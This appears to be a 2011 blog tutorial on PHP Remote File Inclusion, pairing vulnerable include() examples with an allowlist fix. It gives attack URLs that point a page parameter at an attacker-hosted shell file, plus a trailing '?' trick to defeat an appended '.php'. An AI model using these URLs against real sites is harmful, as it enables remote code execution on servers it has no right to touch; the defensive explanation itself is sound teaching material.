
Friday, 20 May 2011

RFI = Remote File Inclusion

RFI is a way of getting a PHP shell that you host elsewhere executed on the target server: a vulnerable script is tricked into including a file from a URL you control, and the target's own PHP interpreter runs it. First off we will take a look at the kind of code that makes this possible. One caveat up front: a remote include only works when PHP's allow_url_include (together with allow_url_fopen) is switched on. allow_url_include has defaulted to Off since PHP 5.2, so on many hosts the same bug is only a local file inclusion, not an RFI.
<?php
// Deliberately vulnerable: the raw "page" parameter goes straight into
// include(). It can be a local path or, if allow_url_include is on, a full
// URL pointing at attacker-hosted code.
$page = $_GET['page'];
include($page);
?>
This code can be arranged several different ways, but it comes down to passing unrestricted user input to include(). To eliminate the problem, map the parameter onto a fixed list of allowed pages (a switch statement or an array lookup) so the user can only choose the ones you provide, fall back to a default page for anything else, and never hand the raw string to include().

But, since you cannot view the PHP source of a web page, we are going to have to detect the flaw some other way. To do this, the target's URL must look something like this:
http://www.slave.com/index.php?page=main.php
The "page" parameter can really have any name; what matters is that a file name is being passed in the query string. If the site's URLs look like this, it might be vulnerable to RFI (or to local file inclusion, if remote URLs are not allowed).

Try manipulating the page variable to point at a URL you control, such as:
http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt
You can replace "http://www.yoursite.com/yourshell.txt" with a shell of your choice. Host it with a non-PHP extension such as .txt so that your own web server sends the source as plain text instead of executing it; the target's PHP does the executing. If it doesn't work, the script may be appending an extension, and there is a way you can possibly get around that.
The code might look something like this:
<?php
// Still vulnerable: the appended ".php" does not restrict what is included,
// it only changes the name the server tries to fetch.
$file = $_GET['page'];
include($file . ".php");
?>
This appends ".php" to whatever is submitted, so the target tries to fetch yourshell.txt.php, which does not exist on your host, and your shell never executes. (Keeping the hosted file as .txt is still correct; the problem is only the suffix the target adds.)
To eliminate this nuisance, we modify our URL manipulation slightly to look like this:
http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?
The trailing "?" turns everything the script appends into a query string rather than part of the file name, so the final URL the target fetches will look like this:
http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?.php
Since ".php" now sits after the "?", your web server ignores it and serves yourshell.txt exactly as before, and the include executes your shell.
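The following is an added example, not code from the original post: it models the two vulnerable include() patterns shown above, demonstrates why the trailing "?" defeats the appended ".php", and gives the allowlist-based fix suggested earlier. The page names under pages/ and the attacker URL are assumptions made for the demo.

```php
<?php
// Added example (not from the original post): models the two vulnerable
// include() patterns discussed above, shows why the "?" trick defeats the
// appended ".php", and gives an allowlist-based replacement.
// Page names under pages/ and the attacker URL are assumptions for the demo.

// Pattern 1 from the post: the raw parameter is the include target.
function include_target_raw(string $page): string
{
    return $page;
}

// Pattern 2 from the post: ".php" is appended before including.
function include_target_with_suffix(string $page): string
{
    return $page . '.php';
}

// For an http(s) target, return the path the remote server is asked for.
// Everything after "?" is a query string and never becomes part of the path,
// which is why a trailing "?" neutralizes a suffix appended by the script.
// Returns null for a non-URL target (a plain local file include).
function fetched_path(string $target): ?string
{
    $parts = parse_url($target);
    if ($parts === false || !isset($parts['scheme'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $parts['path'] ?? '/';
}

// Hardened replacement: the parameter selects from a fixed map of local files.
// The user string itself is never passed to include(), so neither remote URLs
// nor path traversal can reach it. Unknown values fall back to the default.
const ALLOWED_PAGES = [
    'main'    => 'main.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function safe_include_target(string $page): string
{
    $file = ALLOWED_PAGES[$page] ?? ALLOWED_PAGES['main'];
    return __DIR__ . '/pages/' . $file;
}

// Defense in depth: remote includes are impossible when this is off (the
// default since PHP 5.2). Check it on any host you deploy to.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Demo with a constructed attacker-controlled value.
$attacker = 'http://www.yoursite.com/yourshell.txt';

echo "raw:       ", include_target_raw($attacker), "\n";
// http://www.yoursite.com/yourshell.txt  (fetched and executed verbatim)

echo "suffix:    ", fetched_path(include_target_with_suffix($attacker)), "\n";
// /yourshell.txt.php  (does not exist on the attacker's host, shell fails)

echo "suffix+?:  ", fetched_path(include_target_with_suffix($attacker . '?')), "\n";
// /yourshell.txt      (".php" ended up in the query string, shell runs)

echo "allowlist: ", safe_include_target($attacker), "\n";
// <this dir>/pages/main.php  (attacker input discarded, default page served)

echo "allow_url_include on: ", remote_include_enabled() ? 'yes' : 'no', "\n";

// In the real page the fix is simply:
//   $page = $_GET['page'] ?? 'main';
//   include safe_include_target($page);
```

Run it from the command line with php to see the four resolved targets. The allowlist version is the one to copy: because the lookup key is the only thing derived from user input, and the value is always a file you wrote, there is nothing left for the "?" trick or any other suffix manipulation to work on.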
 =========================================================

Credits: Vlatko from Hackforums
